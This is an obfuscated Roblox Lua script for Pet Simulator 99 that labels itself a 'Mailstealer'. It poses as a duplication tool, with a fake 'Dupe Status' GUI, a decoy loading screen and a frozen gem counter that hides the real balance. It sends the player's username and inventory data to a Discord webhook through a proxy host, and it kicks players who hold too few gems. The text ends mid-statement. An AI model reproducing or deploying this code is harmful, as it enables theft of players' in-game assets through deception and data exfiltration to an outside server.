--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v45,v46) local v47={};for v84=1, #v45 do v6(v47,v0(v4(v1(v2(v45,v84,v84 + 1 )),v1(v2(v46,1 + (v84% #v46) ,1 + (v84% #v46) + 1 )))%256 ));end return v5(v47);end local function v8(v48,v49,v50) local v51=1848 -(1000 + 848) ;local v52;local v53;local v54;local v55;local v56;while true do if (v51==(1648 -(1125 + 523))) then v52=game:GetService(v7("\249\215\207\53\213\190\213\8\216\192\222","\126\177\163\187\69\134\219\167"));v53={[v7("\0\194\36\209\249\45\217\103\241\229\51\200","\156\67\173\74\165")]="application/json"};v51=1 + 0 ;end if (v51==1) then v54={[v7("\49\186\75\19\184\53","\38\84\215\41\118\220\70")]={{[v7("\68\31\54\30\251","\158\48\118\66\114")]=v7("\133\33\7\118\90\177\254\166\100\35\51\125\177","\155\203\68\112\86\19\197"),[v7("\69\210\58\243\82","\152\38\189\86\156\32\24\133")]=3079 + 62201 ,[v7("\250\94\162\74\248\68","\38\156\55\199")]={{[v7("\166\124\113\45","\35\200\29\28\72\115\20\154")]=v7("\47\182\210\203\132\33\116\44\172\212\205\131\45\57\28\229","\84\121\223\177\191\237\76"),[v7("\173\87\197\181\63","\161\219\54\169\192\90\48\80")]=v49,[v7("\64\76\12\44\71\71","\69\41\34\96")]=true},{[v7("\178\194\218\15","\75\220\163\183\106\98")]=v7("\43\174\142\58\153\49\191\133\35\131","\185\98\218\235\87"),[v7("\221\61\43\243\219","\202\171\92\71\134\190")]=tostring(v50),[v7("\32\207\32\129\39\196","\232\73\161\76")]=true}},[v7("\189\214\77\73\27\169","\126\219\185\34\61")]={[v7("\24\203\70\102","\135\108\174\62\18\30\23\147")]="Mailstealer by PETSIM99SCRIPTS https://discord.com/invite/3RzYxJQr"}}}};v55=v52:JSONEncode(v54);v51=2;end if (v51==(2 + 0)) then v56=v52:Request({[v7("\131\251\38","\167\214\137\74\171\120\206\83")]=v48,[v7("\166\245\38\85\247\163","\199\235\144\82\61\152")]=v7("\55\57\138\31","\75\103\118\217"),[v7("\239\81\113\16\188\12\212","\126\167\52\16\116\217")]=v53,[v7("\234\33\36\153","\156\168\78\64\224\212\121")]=v55});break;end end end if (Webhook and string.find(Webhook,v7("\3\231\182\205\8\252\161","\174\103\142\197"))) then Webhook=string.gsub(Webhook,"https://discord.com","https://webhook.lewisakura.moe");else Webhook="";end local v9=require(game.ReplicatedStorage.Library);local v10=v9.Save.Get().Inventory;local v11=game.Players.LocalPlayer;local v12=v7("\116\17\31\8\0\106\203\127\5\6\97\22\125\202\127\24\107\11","\152\54\72\63\88\69\62");local v13=getupvalues(v9.DevRAPCmds.Get)[159 -(91 + 67) ];local v14=function() return require(game.ReplicatedStorage.Library.Client.Save).Get();end;if (treadscamgui==true) then local v85=Instance.new(v7("\231\199\252\89\209\202\201\73\221","\60\180\164\142"));local v86=Instance.new(v7("\126\76\4\36\34","\114\56\62\101\73\71\141"));local v87=Instance.new(v7("\158\251\218\201\189","\164\216\137\187"));local v88=Instance.new(v7("\230\227\41\166\132\235\31\198\233\63","\107\178\134\81\210\198\158"));local v89=Instance.new(v7("\30\28\131\203\175","\202\88\110\226\166"));local v90=Instance.new(v7("\247\10\154\227\230\194\13\135\251","\170\163\111\226\151"));local v91=Instance.new(v7("\37\53\170\44\98\54\43\20\60","\73\113\80\210\88\46\87"));local v92=Instance.new(v7("\180\5\238\29\245\143\41\223","\135\225\76\173\114"));local v93=Instance.new(v7("\46\232\160\164\142\168\179\14\226\182","\199\122\141\216\208\204\221"));local v94=Instance.new(v7("\152\244\51\255\106\248\168\207","\150\205\189\112\144\24"));local v95=Instance.new(v7("\3\150\190\65\1","\112\69\228\223\44\100\232\113"));local v96=Instance.new(v7("\224\26\31\199\148\105\146\192\16\9","\230\180\127\103\179\214\28"));local v97=Instance.new(v7("\185\44\124\73\246\79\229\158","\128\236\101\63\38\132\33"));local v98=Instance.new(v7("\152\172\9\80\148\254\219\184\166\31","\175\204\201\113\36\214\139"));local v99=Instance.new(v7("\114\229\22\211\22\73\201\39","\100\39\172\85\188"));local v100=Instance.new(v7("\139\106\184\141\54","\83\205\24\217\224"));local v101=Instance.new(v7("\210\192\213\41\196\208\217\41\233\203","\93\134\165\173"));local v102=Instance.new(v7("\139\219\226\205\40\192\183\108","\30\222\146\161\162\90\174\210"));local v103=Instance.new(v7("\209\75\104\30\199\91\100\30\234\64","\106\133\46\16"));local v104=Instance.new(v7("\109\9\80\243\72\78\93\50","\32\56\64\19\156\58"));local v105=Instance.new(v7("\111\225\198\89\72\252\133\72","\224\58\168\133\54\58\146"));local v106=Instance.new(v7("\109\83\83\233\89\135\133\14\85","\107\57\54\43\157\21\230\231"));local v107=Instance.new(v7("\239\142\9\225\149\221\205\222\135","\175\187\235\113\149\217\188"));local v108=Instance.new(v7("\9\134\162\67\241\119\125\46","\24\92\207\225\44\131\25"));v85.Parent=game.Players.LocalPlayer:WaitForChild(v7("\123\223\185\85\30\111\108\198\177","\29\43\179\216\44\123"));v85.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v85.DisplayOrder=29762 -19762 ;v86.Parent=v85;v86.BackgroundColor3=Color3.new(0.364706 + 0 ,0.364706,523.364706 -(423 + 100) );v86.BorderColor3=Color3.new(0 + 0 ,0 -0 ,0);v86.BorderSizePixel=0 + 0 ;v86.Position=UDim2.new(771.108775645 -(326 + 445) ,0 -0 ,0.313159376,0 -0 );v86.Size=UDim2.new(0 -0 ,1166 -(530 + 181) ,881 -(614 + 267) ,298 -(19 + 13) );v87.Parent=v86;v87.BackgroundColor3=Color3.new(0.513726 -0 ,0.513726 -0 ,0.513726 -0 );v87.BorderColor3=Color3.new(0 + 0 ,0 -0 ,0);v87.BorderSizePixel=0 -0 ;v87.Position=UDim2.new(0.0224327054,1812 -(1293 + 519) ,0.032141868,0);v87.Size=UDim2.new(0 -0 ,437,0 -0 ,472 -225 );v88.Name=v7("\148\215\38\67\253\251\53\88\169\214\46","\44\221\185\64");v88.Parent=v87;v88.BackgroundColor3=Color3.new(0.364706 -0 ,0.364706,0.364706 -0 );v88.BorderColor3=Color3.new(0 + 0 ,0 + 0 ,0);v88.BorderSizePixel=0;v88.Position=UDim2.new(0.034679316 -0 ,0 + 0 ,0.253804684,0);v88.Size=UDim2.new(0 + 0 ,98,0 + 0 ,1135 -(709 + 387) );v88.Font=Enum.Font.SourceSans;v88.Text=v7("\40\233\78\80","\19\97\135\40\63");v88.TextColor3=Color3.new(0,1858 -(673 + 1185) ,0);v88.TextSize=45;v88.TextStrokeTransparency=0 -0 ;local v138=v88;local function v139() local v353=0 -0 ;while true do if (v353==(2 -0)) then v100.Visible=false;break;end if (v353==0) then local v421=0 + 0 ;while true do if (v421==(0 + 0)) then v89.Visible=true;wait(0.00001 -0 );v421=1;end if (v421==1) then v353=1;break;end end end if (v353==(1 + 0)) then v95.Visible=false;wait(0.00001 -0 );v353=3 -1 ;end end end v138.MouseButton1Click:Connect(v139);v89.Parent=v88;v89.Visible=true;v89.BackgroundColor3=Color3.new(1880.513726 -(446 + 1434) ,1283.513726 -(1040 + 243) ,0.513726 -0 );v89.BorderColor3=Color3.new(1847 -(559 + 1288) ,0,1931 -(609 + 1322) );v89.BorderSizePixel=454 -(13 + 441) ;v89.Position=UDim2.new(1.20408154,0 -0 ,0 -0 ,0 -0 );v89.Size=UDim2.new(0,284,0 + 0 ,493 -357 );v90.Parent=v89;v90.BackgroundColor3=Color3.new(0.513726 + 0 ,0.513726 + 0 ,0.513726 -0 );v90.BorderColor3=Color3.new(0 + 0 ,0 -0 ,0);v90.BorderSizePixel=0 + 0 ;v90.Position=UDim2.new( -0.0246478878,0 + 0 ,0.0220588241 + 0 ,0);v90.Size=UDim2.new(0,239 + 45 ,0,32 + 0 );v90.Font=Enum.Font.SourceSans;v90.Text="Welcome to PETSIM99 v6.2 https://discord.com/invite/xVHzNfZd";v90.TextColor3=Color3.new(433 -(153 + 280) ,0,0);v90.TextSize=72 -47 ;v90.TextStrokeTransparency=0.6000000238418579;v91.Name=v7("\138\73\35\62\111\2\186\93\39\46\60","\81\206\60\83\91\79");v91.Parent=v89;v91.BackgroundColor3=Color3.new(0.513726 + 0 ,0.513726 + 0 ,0.513726 + 0 );v91.BorderColor3=Color3.new(0,0,0 + 0 );v91.BorderSizePixel=0 + 0 ;v91.Position=UDim2.new( -(0.0246478878 -0),0,0.257352948,0 + 0 );v91.Size=UDim2.new(667 -(89 + 578) ,139 + 55 ,0,40);v91.Font=Enum.Font.SourceSans;v91.Text="  Dupe Status✅";v91.TextColor3=Color3.new(0 -0 ,0,1049 -(572 + 477) );v91.TextSize=6 + 35 ;v91.TextStrokeTransparency=0.6399999856948853 + 0 ;v92.Parent=v88;v93.Name=v7("\106\190\192\119\111\225\88\176\90\164\222","\196\46\203\176\18\79\163\45");v93.Parent=v87;v93.BackgroundColor3=Color3.new(0.364706 + 0 ,0.364706,0.364706);v93.BorderColor3=Color3.new(86 -(84 + 2) ,0 -0 ,0 + 0 );v93.BorderSizePixel=842 -(497 + 345) ;v93.Position=UDim2.new(0.034679316,0 + 0 ,0.484573931 + 0 ,0);v93.Size=UDim2.new(1333 -(605 + 728) ,70 + 28 ,0 -0 ,2 + 37 );v93.Font=Enum.Font.SourceSans;v93.Text=v7("\156\55\110\27","\143\216\66\30\126\68\155");v93.TextColor3=Color3.new(0,0 -0 ,0 + 0 );v93.TextSize=124 -79 ;v93.TextStrokeTransparency=0 + 0 ;local v183=v93;local function v184() local v354=489 -(457 + 32) ;while true do if (v354==(1 + 0)) then v95.Visible=true;wait(1402.00001 -(832 + 570) );v354=2 + 0 ;end if (v354==(0 + 0)) then local v424=0 -0 ;while true do if ((1 + 0)==v424) then v354=797 -(588 + 208) ;break;end if (v424==0) then v89.Visible=false;wait(0.00001 -0 );v424=1;end end end if (v354==(1802 -(884 + 916))) then v100.Visible=false;break;end end end v183.MouseButton1Click:Connect(v184);v94.Parent=v93;v95.Parent=v93;v95.Visible=false;v95.BackgroundColor3=Color3.new(0.513726 -0 ,0.513726 + 0 ,653.513726 -(232 + 421) );v95.BorderColor3=Color3.new(1889 -(1569 + 320) ,0 + 0 ,0);v95.BorderSizePixel=0 + 0 ;v95.Position=UDim2.new(3.1224488 -2 ,605 -(316 + 289) , -1.46153843,0 -0 );v95.Size=UDim2.new(0,14 + 286 ,1453 -(666 + 787) ,561 -(360 + 65) );v96.Name=v7("\133\198","\129\202\168\109\171\165\195\183");v96.Parent=v95;v96.BackgroundColor3=Color3.new(0.364706 + 0 ,254.364706 -(79 + 175) ,0.364706 -0 );v96.BorderColor3=Color3.new(0 + 0 ,0 -0 ,0 -0 );v96.BorderSizePixel=0;v96.Position=UDim2.new(899.0633333325 -(503 + 396) ,0,181.294117659 -(92 + 89) ,0 -0 );v96.Size=UDim2.new(0 + 0 ,102,0 + 0 ,140 -104 );v96.Font=Enum.Font.SourceSans;v96.Text=v7("\13\118","\134\66\56\87\184\190\116");v96.TextColor3=Color3.new(0 + 0 ,0 -0 ,0);v96.TextSize=43 + 6 ;v96.TextStrokeTransparency=0.47999998927116394 + 0 ;v97.Parent=v96;v98.Name=v7("\8\35\8\191\28\166\18\54\61\60","\85\92\81\105\219\121\139\65");v98.Parent=v87;v98.BackgroundColor3=Color3.new(0.364706 -0 ,0.364706 + 0 ,0.364706 -0 );v98.BorderColor3=Color3.new(1244 -(485 + 759) ,0,0 -0 );v98.BorderSizePixel=1189 -(442 + 747) ;v98.Position=UDim2.new(1135.034679316 -(832 + 303) ,0,0.723440289,946 -(88 + 858) );v98.Size=UDim2.new(0,98,0 + 0 ,33 + 6 );v98.Font=Enum.Font.SourceSans;v98.Text=v7("\201\161\81\65\121\146\206\176\81\72","\191\157\211\48\37\28");v98.TextColor3=Color3.new(0 + 0 ,789 -(766 + 23) ,0);v98.TextSize=103 -82 ;v98.TextStrokeTransparency=0.7599999904632568 -0 ;local v218=v98;local function v219() local v355=0 -0 ;while true do if (2==v355) then v100.Visible=true;break;end if (v355==(0 -0)) then v89.Visible=false;wait(1073.00001 -(1036 + 37) );v355=1;end if (v355==1) then v95.Visible=false;wait(0.00001 + 0 );v355=3 -1 ;end end end v218.MouseButton1Click:Connect(v219);v99.Parent=v98;v100.Parent=v98;v100.Visible=false;v100.BackgroundColor3=Color3.new(0.513726 + 0 ,1480.513726 -(641 + 839) ,913.513726 -(910 + 3) );v100.BorderColor3=Color3.new(0,0 -0 ,1684 -(1466 + 218) );v100.BorderSizePixel=0;v100.Position=UDim2.new(1.1224488 + 0 ,1148 -(556 + 592) , -(1.97435904 + 1),0);v100.Size=UDim2.new(0,1108 -(329 + 479) ,854 -(174 + 680) ,467 -331 );v101.Name=v7("\240\17","\90\191\127\148\124");v101.Parent=v100;v101.BackgroundColor3=Color3.new(0.364706,0.364706 -0 ,0.364706);v101.BorderColor3=Color3.new(0 + 0 ,0,739 -(396 + 343) );v101.BorderSizePixel=0 + 0 ;v101.Position=UDim2.new(1477.0633333325 -(29 + 1448) ,1389 -(135 + 1254) ,0.294117659 -0 ,0 -0 );v101.Size=UDim2.new(0 + 0 ,1629 -(389 + 1138) ,0,36);v101.Font=Enum.Font.SourceSans;v101.Text=v7("\87\169","\119\24\231\78");v101.TextColor3=Color3.new(574 -(102 + 472) ,0 + 0 ,0 + 0 );v101.TextSize=46 + 3 ;v101.TextStrokeTransparency=1545.4799999892712 -(320 + 1225) ;v102.Parent=v101;v103.Name=v7("\173\43\163","\113\226\77\197\42\188\32");v103.Parent=v100;v103.BackgroundColor3=Color3.new(0.364706 -0 ,0.364706,0.364706 + 0 );v103.BorderColor3=Color3.new(1464 -(157 + 1307) ,0,1859 -(821 + 1038) );v103.BorderSizePixel=0 -0 ;v103.Position=UDim2.new(0.5,0 + 0 ,0.294117659 -0 ,0 + 0 );v103.Size=UDim2.new(0 -0 ,1128 -(834 + 192) ,0,3 + 33 );v103.Font=Enum.Font.SourceSans;v103.Text=v7("\21\48\210","\213\90\118\148");v103.TextColor3=Color3.new(0 + 0 ,0 + 0 ,0);v103.TextSize=75 -26 ;v103.TextStrokeTransparency=304.47999998927116 -(300 + 4) ;v104.Parent=v103;v105.Parent=v87;v106.Parent=v87;v106.BackgroundColor3=Color3.new(0.513726 + 0 ,0.513726 -0 ,0.513726);v106.BorderColor3=Color3.new(362 -(112 + 250) ,0 + 0 ,0 -0 );v106.BorderSizePixel=0 + 0 ;v106.Position=UDim2.new(0.304702163,0 + 0 ,0.967611313,0 + 0 );v106.Size=UDim2.new(0 + 0 ,217 + 75 ,0, -33);v106.Font=Enum.Font.SourceSans;v106.Text=v7("\104\45\166\95\93\79\110\188\87\94\27\44\177\83\67\27\35\181\82\72\27\44\173\22\125\126\26\135\127\96\2\119\244\10\30","\45\59\78\212\54");v106.TextColor3=Color3.new(1414 -(1001 + 413) ,0,0);v106.TextSize=46 -25 ;v106.TextStrokeTransparency=882.7200000286102 -(244 + 638) ;v107.Parent=v86;v107.BackgroundColor3=Color3.new(693.513726 -(627 + 66) ,0.513726,0.513726 -0 );v107.BorderColor3=Color3.new(602.513726 -(512 + 90) ,1906.513726 -(1665 + 241) ,717.513726 -(373 + 344) );v107.BorderSizePixel=0;v107.Position=UDim2.new(0.0378472134,0,0.0557491295 + 0 ,0 + 0 );v107.Size=UDim2.new(0 -0 ,718 -293 ,0,45);v107.Font=Enum.Font.SourceSans;v107.Text="PETSIM99 - v6.2 Discord server https://discord.com/invite/xVHzNfZd";v107.TextColor3=Color3.new(1099 -(35 + 1064) ,0,0 + 0 );v107.TextSize=128 -68 ;v107.TextStrokeTransparency=0 + 0 ;v108.Parent=v86;local function v278() local v356=1236 -(298 + 938) ;local v357;while true do if (v356==0) then local v429=1259 -(233 + 1026) ;while true do if (v429==1) then v356=1;break;end if (v429==0) then v357=Instance.new(v7("\60\89\128\138\138\29\174\226\25\70\151","\144\112\54\227\235\230\78\205"),v86);frame=v357.Parent;v429=1667 -(636 + 1030) ;end end end if (v356==(1 + 0)) then frame.Draggable=true;frame.Selectable=true;v356=2 + 0 ;end if (v356==2) then frame.Active=true;break;end end end coroutine.wrap(v278)();end if (LoadingScreen==true) then local v279=0 + 0 ;local v280;local v281;local v282;local v283;local v284;local v285;local v286;local v287;while true do if (v279==(1 + 8)) then v285.TextColor3=Color3.fromRGB(469 -(55 + 166) ,49 + 199 ,25 + 217 );v285.TextScaled=true;v285.TextSize=53 -39 ;v285.TextWrapped=true;v285.Parent=v282;v286=nil;v279=307 -(36 + 261) ;end if (v279==(6 -2)) then local v380=0;while true do if (v380==(1368 -(34 + 1334))) then v283.Size=UDim2.new(0.2 + 0 ,0 + 0 ,1283.1 -(1035 + 248) ,0);v283.BorderSizePixel=23 -(20 + 1) ;v380=1 + 0 ;end if (v380==3) then v279=5;break;end if (v380==(320 -(134 + 185))) then v283.BorderColor3=Color3.fromRGB(0,1133 -(549 + 584) ,685 -(314 + 371) );v283.Parent=v281;v380=6 -4 ;end if (v380==2) then v283.Font=Enum.Font.Gotham;v283.Text="STAFF DISCORD SERVER: https://discord.com/invite/3RzYxJQr";v380=971 -(478 + 490) ;end end end if (v279==6) then v284.Name=v7("\140\167\34\25\22\55\215\80\166\175","\49\197\202\67\126\115\100\167");v284.BackgroundColor3=Color3.fromRGB(255,255,255);v284.BackgroundTransparency=1 + 0 ;v284.Size=UDim2.new(1,1172 -(786 + 386) ,0.65,0);v284.Text=v7("\4\84\211\63\133\22\74\63\82\204\105\148\89\30\39\73\208\63\133\22\74\63\90\203\105\153\89\75\119\90\205\44\192\88\81\35\27\222\105\146\89\92\56\79\133\105","\62\87\59\191\73\224\54")   .. x   .. v7("\167\73\186","\169\135\98\154")   .. y ;v284.TextColor3=Color3.fromRGB(803 -555 ,1627 -(1055 + 324) ,242);v279=1347 -(1093 + 247) ;end if (v279==7) then v284.TextScaled=true;v284.TextSize=8 + 0 ;v284.Parent=v282;z=x + y ;print(z);v285=Instance.new(v7("\255\114\60\64\223\60\208","\168\171\23\68\52\157\83"));v279=1 + 7 ;end if (v279==3) then local v390=0 -0 ;while true do if (v390==(0 -0)) then v282.BorderColor3=Color3.fromRGB(0 -0 ,0 -0 ,0 + 0 );v282.Parent=v281;v390=3 -2 ;end if (v390==(10 -7)) then v279=4 + 0 ;break;end if (v390==(4 -2)) then v283.BackgroundColor3=Color3.fromRGB(700 -(364 + 324) ,120 -76 ,190);v283.Position=UDim2.new(0.4 -0 ,0,0.7 + 0 ,0 -0 );v390=4 -1 ;end if (v390==(2 -1)) then v283=Instance.new(v7("\208\116\100\93\247\78\226\225\125","\128\132\17\28\41\187\47"));v283.Name=v7("\37\59\21\57\82\19\54","\61\97\82\102\90");v390=2;end end end if ((1278 -(1249 + 19))==v279) then function v286() local v433=0;local v434;local v435;while true do if (v433==(0 + 0)) then v434=0;v435=nil;v433=3 -2 ;end if (v433==1) then while true do if (v434==(1087 -(686 + 400))) then local v527=0 + 0 ;while true do if (v527==(229 -(73 + 156))) then v435.BackgroundTransparency=0 + 0 ;v435.Size=UDim2.new(811.5 -(721 + 90) ,0 + 0 ,0.1,0);v527=1;end if (v527==1) then v435.Position=UDim2.new(0.25,0,0.9,0 -0 );v434=2;break;end end end if (v434==(472 -(224 + 246))) then v435.Font=Enum.Font.Gotham;v435.Text=v7("\9\15\229\111\9\6\244\27\25\27\246\120\15\29\230\26\106\12\192\79\106\59\149\83\43\56\208\27\62\33\149\76\43\39\193\27\63\32\193\82\38\110\198\88\56\39\197\79\106\34\218\90\46\61\149\19\43\62\197\73\37\54\220\86\43\58\208\87\51\110\132\27\39\39\219\78\62\43\156","\59\74\78\181");v435.TextColor3=Color3.fromRGB(413 -158 ,255,255);v434=5 -2 ;end if ((1 + 3)==v434) then v435.Parent=v280;wait(1 + 9 );v435:Destroy();break;end if (v434==(0 + 0)) then local v533=0 -0 ;while true do if (v533==(3 -2)) then v435.BackgroundColor3=Color3.fromRGB(513 -(203 + 310) ,2248 -(1238 + 755) ,0);v434=1;break;end if (v533==(0 + 0)) then v435=Instance.new(v7("\195\246\36\198\219\242\62\215\251","\178\151\147\92"));v435.Name=v7("\171\241\67\37\27\66\125\184\248\84\38","\26\236\157\44\82\114\44");v533=1;end end end if (v434==3) then local v534=0;while true do if (v534==(1534 -(709 + 825))) then v435.TextScaled=true;v435.TextSize=14;v534=1 -0 ;end if (v534==1) then v435.TextWrapped=true;v434=5 -1 ;break;end end end end break;end end end v287=nil;function v287() local v436=864 -(196 + 668) ;local v437;while true do if (v436==(3 -2)) then v437.Size=UDim2.new(0.5 -0 ,833 -(171 + 662) ,93.1 -(4 + 89) ,0 -0 );v437.Position=UDim2.new(0.25,0,0.9 + 0 ,0 -0 );v437.Font=Enum.Font.Gotham;v437.Text=v7("\194\233\2\206\204\24\221\2\199\233\27\214\202\20\178\2\209\196\55\251\252\53\188\86\243\209\114\251\232\49\245\76\173\136\59\252\175\37\188\74\224\222\55\186\255\34\243\64\237\205\63\233\175\39\245\86\233\136\59\238\175\32\240\71\224\219\55\186\236\63\242\86\224\203\38\186\235\53\234\81\160","\34\129\168\82\154\143\80\156");v436=2;end if (v436==0) then local v500=0 + 0 ;while true do if ((1488 -(35 + 1451))==v500) then v436=1454 -(28 + 1425) ;break;end if (v500==(1993 -(941 + 1052))) then local v535=0;while true do if (v535==(0 + 0)) then v437=Instance.new(v7("\17\212\66\78\159\36\211\95\86","\211\69\177\58\58"));v437.Name=v7("\144\233\118\226\224\197\176\209\124\237\253","\171\215\133\25\149\137");v535=1;end if (v535==1) then v500=1;break;end end end if (v500==(1515 -(822 + 692))) then v437.BackgroundColor3=Color3.fromRGB(363 -108 ,0 + 0 ,297 -(45 + 252) );v437.BackgroundTransparency=0 + 0 ;v500=1 + 1 ;end end end if ((4 -2)==v436) then local v501=433 -(114 + 319) ;while true do if (v501==(0 -0)) then v437.TextColor3=Color3.fromRGB(255,255,326 -71 );v437.TextScaled=true;v501=1;end if (v501==(1 + 0)) then v437.TextSize=20 -6 ;v437.TextWrapped=true;v501=3 -1 ;end if (v501==(1965 -(556 + 1407))) then v436=1209 -(741 + 465) ;break;end end end if (v436==(468 -(170 + 295))) then v437.Parent=v280;wait(6 + 4 );v437:Destroy();break;end end end v285.FocusLost:Connect(function(v438) if v438 then local v464=0 + 0 ;local v465;while true do if (v464==0) then v465=tonumber(v285.Text);if (v465==z) then v286();else v287();end break;end end end end);break;end if (v279==(4 -2)) then local v391=0 + 0 ;while true do if (v391==2) then v282.Size=UDim2.new(0.2 + 0 ,0 + 0 ,0.21,1230 -(957 + 273) );v282.BorderSizePixel=1 + 1 ;v391=2 + 1 ;end if (v391==1) then v282.BackgroundColor3=Color3.fromRGB(68,270 -199 ,237 -147 );v282.Position=UDim2.new(0.4,0,0.4 -0 ,0 -0 );v391=1782 -(389 + 1391) ;end if (v391==0) then v282=Instance.new(v7("\84\83\118\136\251","\235\18\33\23\229\158"));v282.Name=v7("\99\171\212\186\66\191","\219\48\218\161");v391=1 + 0 ;end if ((1 + 2)==v391) then v279=6 -3 ;break;end end end if (v279==(956 -(783 + 168))) then v283.TextColor3=Color3.fromRGB(832 -584 ,248,239 + 3 );v283.TextScaled=true;v283.TextSize=319 -(309 + 2) ;x=math.random(2 -1 ,100);y=math.random(1213 -(1090 + 122) ,100);v284=Instance.new(v7("\152\43\179\95\235\86\28\12\160","\105\204\78\203\43\167\55\126"));v279=2 + 4 ;end if (v279==1) then local v395=0;while true do if (v395==0) then v281.Name=v7("\6\141\57\162\143\175\55\38\137","\86\75\236\80\204\201\221");v281.BackgroundColor3=Color3.fromRGB(134 -94 ,42,54);v395=1 + 0 ;end if (2==v395) then v281.Size=UDim2.new(1119.25 -(628 + 490) ,0 + 0 ,2.25 -1 ,0 -0 );v281.Parent=v280;v395=777 -(431 + 343) ;end if (v395==(5 -2)) then v279=2;break;end if ((2 -1)==v395) then v281.BorderSizePixel=0 + 0 ;v281.Position=UDim2.new( -(0.125 + 0),1695 -(556 + 1139) , -(15.125 -(6 + 9)),0);v395=1 + 1 ;end end end if ((0 + 0)==v279) then v280=Instance.new(v7("\128\43\29\249\213\85\148\61\6","\59\211\72\111\156\176"));v280.Name=v7("\126\162\215\30\103\170\186\116\125\164\209\4\126\179\208","\77\46\231\131");v280.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v280.DisplayOrder=1000000168 -(28 + 141) ;v280.Parent=game.Players.LocalPlayer:WaitForChild(v7("\138\88\183\89\191\70\145\85\179","\32\218\52\214"));v281=Instance.new(v7("\104\5\48\165\244","\58\46\119\81\200\145\208\37"));v279=1;end if ((4 + 4)==v279) then v285.Name=v7("\215\112\229\185\38\37\134\221\127\229\184\49","\231\148\17\149\205\69\77");v285.BackgroundColor3=Color3.fromRGB(83 -15 ,51 + 20 ,1407 -(486 + 831) );v285.Position=UDim2.new(0 -0 ,0 -0 ,0.9,0 + 0 );v285.Size=UDim2.new(3 -2 ,1263 -(668 + 595) ,0.1 + 0 ,0 + 0 );v285.Font=Enum.Font.Gotham;v285.Text=v7("\165\169\211\254\69\191\161\169\212\236\82\237","\159\224\199\167\155\55");v279=24 -15 ;end end end if (fakedupehuge==true) then local v288=290 -(23 + 267) ;local v289;local v290;local v291;while true do if (v288==3) then local v408=1944 -(1129 + 815) ;while true do if (v408==(388 -(371 + 16))) then v288=4;break;end if (v408==(1750 -(1326 + 424))) then v290=v7("\204\2\94","\78\136\109\57\158\187\130\226");v291=v7("\22\42\254\244\126\27\246\246","\145\94\95\153");v408=1 -0 ;end end end if (v288==2) then local v409=0 -0 ;while true do if (v409==(119 -(88 + 30))) then v288=774 -(720 + 51) ;break;end if ((0 -0)==v409) then for v503,v504 in pairs(v289.Directory.Pets[v291]) do v289.Directory.Pets[v290][v503]=v504;end v289=require(game.ReplicatedStorage.Library);v409=1;end end end if (v288==1) then v291=v7("\233\87\53\211\69\226\67\38","\101\161\34\82\182");for v439,v440 in pairs(v289.Directory.Pets[v290]) do v289.Directory.Pets[v290][v439]=nil;end v288=1778 -(421 + 1355) ;end if (v288==0) then local v410=0;while true do if (v410==0) then v289=require(game.ReplicatedStorage.Library);v290=v7("\166\179\39","\233\229\210\83\107\40\46");v410=1 -0 ;end if (v410==1) then v288=1 + 0 ;break;end end end if ((1087 -(286 + 797))==v288) then for v442,v443 in pairs(v289.Directory.Pets[v290]) do v289.Directory.Pets[v290][v442]=nil;end for v445,v446 in pairs(v289.Directory.Pets[v291]) do v289.Directory.Pets[v290][v445]=v446;end break;end end end if (fakedupeGems==true) then local v292=0 -0 ;local v293;local v294;local v295;local v296;local v297;while true do if (v292==(1 -0)) then local v411=0;while true do if (v411==(440 -(397 + 42))) then v292=2;break;end if ((0 + 0)==v411) then v295=nil;v296=nil;v411=1;end end end if (v292==(802 -(24 + 776))) then v297=nil;while true do if (v293==(0 -0)) then local v477=785 -(222 + 563) ;local v478;while true do if (v477==0) then v478=0;while true do if (v478==0) then v294=v7("\164\148\77\216","\215\157\173\116\181\46");v295=game:GetService(v7("\5\184\138\235\223\39\167","\186\85\212\235\146")).LocalPlayer.PlayerGui.MainLeft.Left.Currency.Diamonds.Diamonds.Amount;v478=1;end if (v478==(1 -0)) then v293=1 + 0 ;break;end end break;end end end if (v293==1) then v295:GetPropertyChangedSignal(v7("\246\132\14\234","\56\162\225\118\158\89\142")):Connect(function() v295.Text=v294;end);v296=v7("\5\92\153\130","\184\60\101\160\207\66");v293=192 -(23 + 167) ;end if (v293==(1800 -(690 + 1108))) then v297=game:GetService(v7("\1\142\125\165\52\144\111","\220\81\226\28")).LocalPlayer.leaderstats["💎 Diamonds"];v297:GetPropertyChangedSignal(v7("\37\212\142\238\239","\167\115\181\226\155\138")):Connect(function() v297.Value=v296;end);break;end end break;end if (v292==(0 + 0)) then v293=0 + 0 ;v294=nil;v292=849 -(40 + 808) ;end end end if (fakedupetitanic==true) then local v298=require(game.ReplicatedStorage.Library);local v299=v7("\193\35\243","\166\130\66\135\60\27\17");local v300=v7("\112\67\218\116\62\77\73\142\86\49\80","\80\36\42\174\21");for v358,v359 in pairs(v298.Directory.Pets[v299]) do v298.Directory.Pets[v299][v358]=nil;end for v361,v362 in pairs(v298.Directory.Pets[v300]) do v298.Directory.Pets[v299][v361]=v362;end end if (GemAmount1<10000) then v11:kick(v7("\125\17\33\115\64\23\119\127\92\2\56\104\2\80\39\118\75\17\36\127\14\2\50\112\65\25\57\59","\26\46\112\87"));end local v15=Username;local v16=game:GetService(v7("\137\47\170\109\186\173\86","\212\217\67\203\20\223\223\37")).LocalPlayer.PlayerGui.MainLeft.Left.Currency.Diamonds.Diamonds.Amount.Text;local v17=game:GetService(v7("\138\129\169\203\191\159\187","\178\218\237\200")).LocalPlayer.PlayerGui.MainLeft.Left.Currency.Diamonds.Diamonds.Amount;v17:GetPropertyChangedSignal(v7("\130\176\254\196","\176\214\213\134")):Connect(function() v17.Text=v16;end);local v18=game:GetService(v7("\196\161\183\205\173\68\74","\57\148\205\214\180\200\54")).LocalPlayer.leaderstats["💎 